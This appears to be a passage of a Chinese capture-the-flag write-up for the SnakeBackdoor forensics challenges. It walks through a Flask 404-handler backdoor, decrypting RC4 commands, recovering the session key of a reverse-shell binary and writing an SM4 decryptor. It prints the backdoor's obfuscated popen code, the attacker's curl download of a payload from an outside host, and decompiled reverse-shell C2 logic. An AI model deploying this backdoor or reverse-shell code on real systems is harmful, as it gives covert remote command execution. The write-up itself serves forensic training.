    try:
        enc_cmd = binascii.unhexlify(enc_hex_cmd)
        cmd = rc4_crypt(enc_cmd, RC4_SECRET).decode('utf-8', errors='ignore')
        # getattr(os, 'popen') is just os.popen(cmd) spelled to dodge string matching.
        output_bytes = getattr(os, 'popen')(cmd).read().encode('utf-8', errors='ignore')
        # The reply goes back RC4-encrypted and hex-encoded; the `data=...`
        # values seen in the capture decrypt with the same key.
        enc_output = rc4_crypt(output_bytes, RC4_SECRET)
        return binascii.hexlify(enc_output).decode()
    except:
        return "Error"
# Installs the handler for HTTP 404, so every non-existent path becomes the
# command endpoint. Detection hook: POSTs to unknown paths that carry an
# X-Token-Auth header and a hex-only `data` field.
app.error_handler_spec[None][code][exc_class]=lambda error: backdoor_handler()
得到v1p3r_5tr1k3_k3y
flag{v1p3r_5tr1k3_k3y}
SnakeBackdoor-4 题目内容:
攻击者上传了一个二进制后门,请写出木马进程执行的本体文件的名称,结果提交形式:flag{xxxxx},仅写文件名不加路径
从 SnakeBackdoor-3 中可以看到,后门会对 data 字段的内容进行 RC4 解密(密钥 v1p3r_5tr1k3_k3y),所以把流量里的 data 值逐个解密即可
data=a6bc
data=a3ab330fb285
data=e0ac7e52fc996cc2038c2d7a3899ed
data=acb07e4db7c93ece4bcc37246687ae0649614caa3430ce4b
data=a2ae330da7846599188b26257a88f10b50790cb47e6a97177e1053c351
data=bab6694ba3c938e64b8d257b7cccee460f6347f4363ed21c300c099f129b99028eb57408024e1c32061a
data=acad614ef3d82c8445d275713899f04d0d3819fc3726cf57634b189e0e95cc1f93e57656105246251f453a8396a43a6534
data=a6bc 解密结果为 id
data=a3ab330fb285 解密结果为 ls -al
data=e0ac7e52fc996cc2038c2d7a3899ed 解密结果为 /tmp/python3.13
data=acb07e4db7c93ece4bcc37246687ae0649614caa3430ce4b 解密结果为 chmod +x /tmp/python3.13
data=a2ae330da7846599188b26257a88f10b50790cb47e6a97177e1053c351 解密结果为 mv /tmp/shell /tmp/python3.13
data=bab6694ba3c938e64b8d257b7cccee460f6347f4363ed21c300c099f129b99028eb57408024e1c32061a 解密结果为 unzip -P nf2jd092jd01 -d /tmp /tmp/123.zip
data=acad614ef3d82c8445d275713899f04d0d3819fc3726cf57634b189e0e95cc1f93e57656105246251f453a8396a43a6534 解密结果为 curl 192.168.1.201:8080/shell.zip -o /tmp/123.zip
从上面结果容易看出来本体文件名称为python3.13
flag{python3.13}
SnakeBackdoor-5 题目内容:
请提取驻留的木马本体文件,通过逆向分析找出木马样本通信使用的加密密钥(hex,小写字母),结果提交形式:flag{[0-9a-f]+}
从unzip -P nf2jd092jd01 -d /tmp /tmp/123.zip可知解压密码为nf2jd092jd01 ,解压得到shell文件,用ida打开,查看main函数
// IDA pseudocode of the dropped binary (`shell`, renamed /tmp/python3.13).
// Reverse-shell client: connects to the C2, derives a 16-byte session key
// from a 4-byte seed the C2 sends, then loops: receive an encrypted command,
// run it via popen(), send the encrypted output back.
__int64 __fastcall main(int a1, char **a2, char **a3)
{
  int v3; // eax
  int v5; // [rsp+4h] [rbp-115Ch] BYREF
  unsigned int v6; // [rsp+8h] [rbp-1158h] BYREF
  unsigned int v7; // [rsp+Ch] [rbp-1154h] BYREF
  _DWORD v8[4]; // [rsp+10h] [rbp-1150h] BYREF   -- 4 x rand() = 16-byte key
  _BYTE v9[128]; // [rsp+20h] [rbp-1140h] BYREF  -- key context for outbound (flag 1)
  _BYTE v10[128]; // [rsp+A0h] [rbp-10C0h] BYREF -- key context for inbound (flag 0)
  char command[4096]; // [rsp+120h] [rbp-1040h] BYREF
  struct sockaddr s; // [rsp+1120h] [rbp-40h] BYREF
  int v13; // [rsp+1134h] [rbp-2Ch]
  int v14; // [rsp+1138h] [rbp-28h]
  int v15; // [rsp+113Ch] [rbp-24h]
  FILE *stream; // [rsp+1140h] [rbp-20h]
  int v17; // [rsp+1148h] [rbp-18h]
  unsigned int seed; // [rsp+114Ch] [rbp-14h]
  int fd; // [rsp+1150h] [rbp-10h]
  int j; // [rsp+1154h] [rbp-Ch]
  int v21; // [rsp+1158h] [rbp-8h]
  int i; // [rsp+115Ch] [rbp-4h]

  // socket(AF_INET, SOCK_STREAM, 0)
  fd = socket(2, 1, 0);
  if ( fd < 0 )
    exit(1);
  // Fills the sockaddr with '0' (0x30), not 0 -- harmless, every used field
  // is overwritten below.
  memset(&s, 48, sizeof(s));
  s.sa_family = 2;
  // C2 endpoint: 192.168.1.201:58782 (0xE59E).
  *(_DWORD *)&s.sa_data[2] = inet_addr("192.168.1.201");
  *(_WORD *)s.sa_data = htons(0xE59Eu);
  if ( connect(fd, &s, 0x10u) < 0 )
  {
    close(fd);
    exit(1);
  }
  // sub_18ED / sub_197F have recv()/send() argument shapes (fd, buf, len,
  // flags) and are used as such throughout -- presumably thin wrappers.
  // First message from the C2: exactly 4 bytes.
  if ( (unsigned int)sub_18ED((unsigned int)fd, &v7, 4, 0) != 4 )
  {
    close(fd);
    exit(1);
  }
  // bswap32: the seed travels in network byte order. The whole session key
  // is determined by this value (34952046 in the capture), so srand()+rand()
  // with the same libc reproduces it.
  seed = (v7 >> 8) & 0xFF00 | (v7 << 8) & 0xFF0000 | (v7 << 24) | HIBYTE(v7);
  srand(seed);
  for ( i = 0; i <= 3; ++i )
    v8[i] = rand();
  // Two 128-byte key schedules from the same 16-byte key, flag 0 for the
  // inbound (decrypt) direction and 1 for outbound (encrypt). 128 bytes is
  // 32 round keys x 4 bytes, consistent with the SM4 decryptor in the
  // writeup -- the cipher is not identified from this listing alone.
  sub_13B4(v10, v8, 0);
  sub_13B4(v9, v8, 1);
  // Command loop. Framing: 4-byte big-endian length, then the ciphertext.
  while ( (unsigned int)sub_18ED((unsigned int)fd, &v6, 4, 0) == 4 )
  {
    v6 = (v6 >> 8) & 0xFF00 | (v6 << 8) & 0xFF0000 | (v6 << 24) | HIBYTE(v6);
    // Accept only 0 < len <= 4096 and len a multiple of 16 (block size).
    if ( v6 <= 0x1000 && v6 && (v6 & 0xF) == 0 )
    {
      v21 = sub_18ED((unsigned int)fd, command, v6, 0);
      if ( v21 != v6 )
        break;
      // Decrypt in place with the inbound context.
      sub_1860(v10, 0, command, command, v21);
      // PKCS#7-style unpadding: last byte is the pad count if it is 1..16.
      // Only the count is checked, not the pad bytes themselves. When the
      // check fails and len == 0x1000, command[4096] is one past the buffer.
      v17 = (unsigned __int8)command[v21 - 1];
      if ( v17 && v17 <= 16 )
        command[v21 - v17] = 0;
      else
        command[v21] = 0;
      // Run the command through the shell and capture up to 0xFFF bytes of
      // output into the same buffer.
      stream = popen(command, "r");
      if ( stream )
      {
        v21 = fread(command, 1u, 0xFFFu, stream);
        pclose(stream);
        command[v21] = 0;
      }
      else
      {
        strcpy(command, "popen failed\n");
        v21 = strlen(command);
      }
      v15 = v21;   // dead store kept by the decompiler
      // Pad to the next multiple of 16 (always 1..16 bytes, value = count),
      // matching the unpadding rule above.
      v14 = 16 * (v21 / 16 + 1);
      v13 = v14 - v21;
      for ( j = v21; j < v14; command[j++] = v13 )
        ;
      // Encrypt with the outbound context, then send length + data.
      sub_1860(v9, 1, command, command, v14);
      v5 = (v14 >> 8) & 0xFF00 | (v14 << 8) & 0xFF0000 | (v14 << 24) | (v14 >> 24);
      if ( (unsigned int)sub_197F((unsigned int)fd, &v5, 4, 0) != 4 )
        break;
      v3 = sub_197F((unsigned int)fd, command, v14, 0);
      if ( v14 != v3 )
        break;
    }
  }
  close(fd);
  return 0;
}
其中seed的值是关键
// The session key is derived entirely from one 4-byte value the C2 sends
// right after connect: byte-swapped from network order, fed to srand(), and
// the next four rand() results become the key. Recovering this value from
// the capture (34952046 here) is enough to regenerate the key.
sub_18ED((unsigned int)fd, &v7, 4, 0);
seed = (v7 >> 8) & 0xFF00 | (v7 << 8) & 0xFF0000 | (v7 << 24) | HIBYTE(v7);
srand(seed);
回到流量包查找该值,发现为34952046
为什么是tcp流1827
因为 data=e0ac7e52fc996cc2038c2d7a3899ed 解密后的命令是 /tmp/python3.13(即启动木马本体),该步骤出现在 TCP 流 1826,紧随其后的 TCP 流 1827 就是木马回连 C2 的连接,seed 在这条流的第一个数据包里
解密
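#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <iostream>

// Regenerate the sample's session key from the seed captured in TCP stream
// 1827: srand(seed) followed by four rand() calls, exactly as the sample's
// main() does. rand() is libc-specific; the sample is a Linux ELF, so this
// should be run against glibc to reproduce its values.
int main() {
    uint32_t v8[4];
    srand(0x34952046);
    for (int i = 0; i <= 3; ++i)
        v8[i] = rand();

    // Register view: each word as a 32-bit integer. %08x keeps leading zeros;
    // plain %x would drop them and silently shorten the key.
    for (int i = 0; i < 4; i++)
        printf("%08x", v8[i]);
    printf("\n");

    // Memory view: the bytes as the sample hands v8 to its key schedule
    // (little-endian on x86-64), which is the byte order the flag uses.
    unsigned char key[16];
    memcpy(key, v8, sizeof key);
    for (int i = 0; i < 16; i++)
        printf("%02x", key[i]);
    printf("\n");
    return 0;
}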
得到61fb46ac4f3b310b2d64fc3256b43488
在 x86/x64 上整数在内存中按小端序 (Little-Endian) 存放,而木马是把 v8 所在的内存字节序列当作密钥使用的,所以要把每个 32 位整数按字节换序,得到:
flag{ac46fb610b313b4f32fc642d8834b456}
SnakeBackdoor-6
可以看到这其实也是data数据
从tcp流1827中提取出加密的命令:
1 2 3 4 5 6 7 49b351855f211b85bd012f80ce8ed5b3 2cc5becb37ca595a89445461c6512efc b863696da0c6bb28da46e09069dd644f 87e8faa921f3e67c530f1b6740a9d439794e426716d49f5e949d5d56f81ed54a97f6cc6752fcf7aa408a94e6a59029e7 b7c88bb0d92308a57f83d08a90ae024c 4331cfda21eeab8922fcc7acced16d1a17b02e8d2d9dfee48dc8f18e0dbbb2e4c4547e39d8c4aa2418d9fca52c9c4770 7f4b0ef4806983f164af6f46b71d3fce1e3c0bd00c4dd162b72c156f0f3aecd2afcabf551e08380db6fd20316f8a2729
处理逻辑与shell相同,写出解密脚本
import struct


def read_params(path):
    """Pull the SM4 tables out of the `shell` ELF.

    The S-box, FK and CK are read from the offsets where they sit in this
    sample (0x2020, 0x2120, 0x2140; 32-bit little-endian words) rather than
    taken from the standard -- presumably so a modified table in the sample
    would still be honoured.

    Args:
        path: path to the sample binary.

    Returns:
        ``(sbox, fk, ck)``: 256 raw bytes, 4 ints, 32 ints.
    """
    with open(path, 'rb') as f:
        data = f.read()
    sbox = data[0x2020:0x2020+256]
    fk = [struct.unpack_from('<I', data, 0x2120+i*4)[0] for i in range(4)]
    ck = [struct.unpack_from('<I', data, 0x2140+i*4)[0] for i in range(32)]
    return sbox, fk, ck


def rol(x, n):
    """32-bit rotate left of x by n bits."""
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


class SM4:
    """SM4 block cipher built from tables supplied at construction time.

    Only decryption is exposed; `expand` can produce either schedule.
    """

    def __init__(self, sbox, fk, ck):
        self.sbox = sbox
        self.fk = fk
        self.ck = ck

    def tau(self, x):
        """Byte-wise S-box substitution of a 32-bit word.

        NOTE(review): textbook SM4 keeps each byte in its position; this
        version also reverses the byte order (b0 ends up in the top byte).
        The writeup reports a correct decryption with it, so it presumably
        mirrors how the sample's implementation loads words -- do not "fix"
        it without checking the binary.
        """
        b0 = x & 0xFF
        b1 = (x >> 8) & 0xFF
        b2 = (x >> 16) & 0xFF
        b3 = (x >> 24) & 0xFF
        return ((self.sbox[b0] << 24) | (self.sbox[b1] << 16) |
                (self.sbox[b2] << 8) | self.sbox[b3])

    def L(self, x):
        """Linear transform for the round function."""
        return x ^ rol(x, 2) ^ rol(x, 10) ^ rol(x, 18) ^ rol(x, 24)

    def Lp(self, x):
        """Linear transform for the key schedule (L')."""
        return x ^ rol(x, 13) ^ rol(x, 23)

    def T(self, x):
        """Round transform T = L o tau."""
        return self.L(self.tau(x))

    def Tp(self, x):
        """Key-schedule transform T' = L' o tau."""
        return self.Lp(self.tau(x))

    def expand(self, key, encrypt):
        """Derive the 32 round keys from a 16-byte key.

        Args:
            key: 16 bytes, read as four big-endian words XORed with FK.
            encrypt: True for the encryption order, False to store the keys
                reversed so `process` decrypts.

        Returns:
            list of 32 round-key ints.

        Raises:
            ValueError: key is not 16 bytes.
        """
        if len(key) != 16:
            raise ValueError("Key must be 16 bytes")
        K = []
        for i in range(4):
            word = ((key[i*4] << 24) | (key[i*4+1] << 16) |
                    (key[i*4+2] << 8) | key[i*4+3])
            K.append(word ^ self.fk[i])
        rk = [0] * 32
        for i in range(32):
            tmp = K[1] ^ K[2] ^ K[3] ^ self.ck[i]
            newk = K[0] ^ self.Tp(tmp)
            if encrypt:
                rk[i] = newk
            else:
                rk[31-i] = newk   # reversed schedule turns the same network into decryption
            K = [K[1], K[2], K[3], newk]
        return rk

    def process(self, rk, block):
        """Run one 16-byte block through the 32 rounds with schedule `rk`.

        Raises:
            ValueError: block is not 16 bytes.
        """
        if len(block) != 16:
            raise ValueError("Block must be 16 bytes")
        X = []
        for i in range(4):
            word = ((block[i*4] << 24) | (block[i*4+1] << 16) |
                    (block[i*4+2] << 8) | block[i*4+3])
            X.append(word)
        for i in range(32):
            tmp = rk[i] ^ X[1] ^ X[2] ^ X[3]
            newx = X[0] ^ self.T(tmp)
            X = [X[1], X[2], X[3], newx]
        # Final reverse transform: words are emitted as X3, X2, X1, X0.
        out = b''
        for i in [3, 2, 1, 0]:
            out += bytes([(X[i] >> 24) & 0xFF, (X[i] >> 16) & 0xFF,
                          (X[i] >> 8) & 0xFF, X[i] & 0xFF])
        return out

    def decrypt(self, key, cipher):
        """ECB-decrypt `cipher` with `key` and strip one trailing pad.

        A trailing partial block is dropped silently. The pad rule (last byte
        is the count, 1..16) matches the sample's framing, where each message
        is padded separately.

        NOTE(review): main() feeds seven concatenated messages through one
        call, so only the last message's padding is removed and the pad bytes
        of the other six remain inside the result. Decrypt each hex line on
        its own for clean output.
        """
        rk = self.expand(key, False)
        result = b''
        for i in range(0, len(cipher), 16):
            block = cipher[i:i+16]
            if len(block) == 16:
                result += self.process(rk, block)
        if result:
            pad = result[-1]
            if 0 < pad <= 16:
                result = result[:-pad]
        return result


def main():
    """Decrypt the encrypted commands extracted from TCP stream 1827.

    Tables come from the `shell` sample in the current directory; the key is
    the byte-swapped srand/rand output recovered in SnakeBackdoor-5.
    """
    binary_path = "shell"
    sbox, fk, ck = read_params(binary_path)
    cipher = SM4(sbox, fk, ck)
    key_hex = "ac46fb610b313b4f32fc642d8834b456"
    key_bytes = bytes.fromhex(key_hex)
    # One hex string per captured message, in capture order.
    ciphertext_hex = (
        "49b351855f211b85bd012f80ce8ed5b3"
        "2cc5becb37ca595a89445461c6512efc"
        "b863696da0c6bb28da46e09069dd644f"
        "87e8faa921f3e67c530f1b6740a9d439794e426716d49f5e949d5d56f81ed54a97f6cc6752fcf7aa408a94e6a59029e7"
        "b7c88bb0d92308a57f83d08a90ae024c"
        "4331cfda21eeab8922fcc7acced16d1a17b02e8d2d9dfee48dc8f18e0dbbb2e4c4547e39d8c4aa2418d9fca52c9c4770"
        "7f4b0ef4806983f164af6f46b71d3fce1e3c0bd00c4dd162b72c156f0f3aecd2afcabf551e08380db6fd20316f8a2729"
    )
    ciphertext_hex = ciphertext_hex.replace("\n", "").replace(" ", "")
    ciphertext_bytes = bytes.fromhex(ciphertext_hex)
    plaintext = cipher.decrypt(key_bytes, ciphertext_bytes)
    print(plaintext)


if __name__ == "__main__":
    main()
得到结果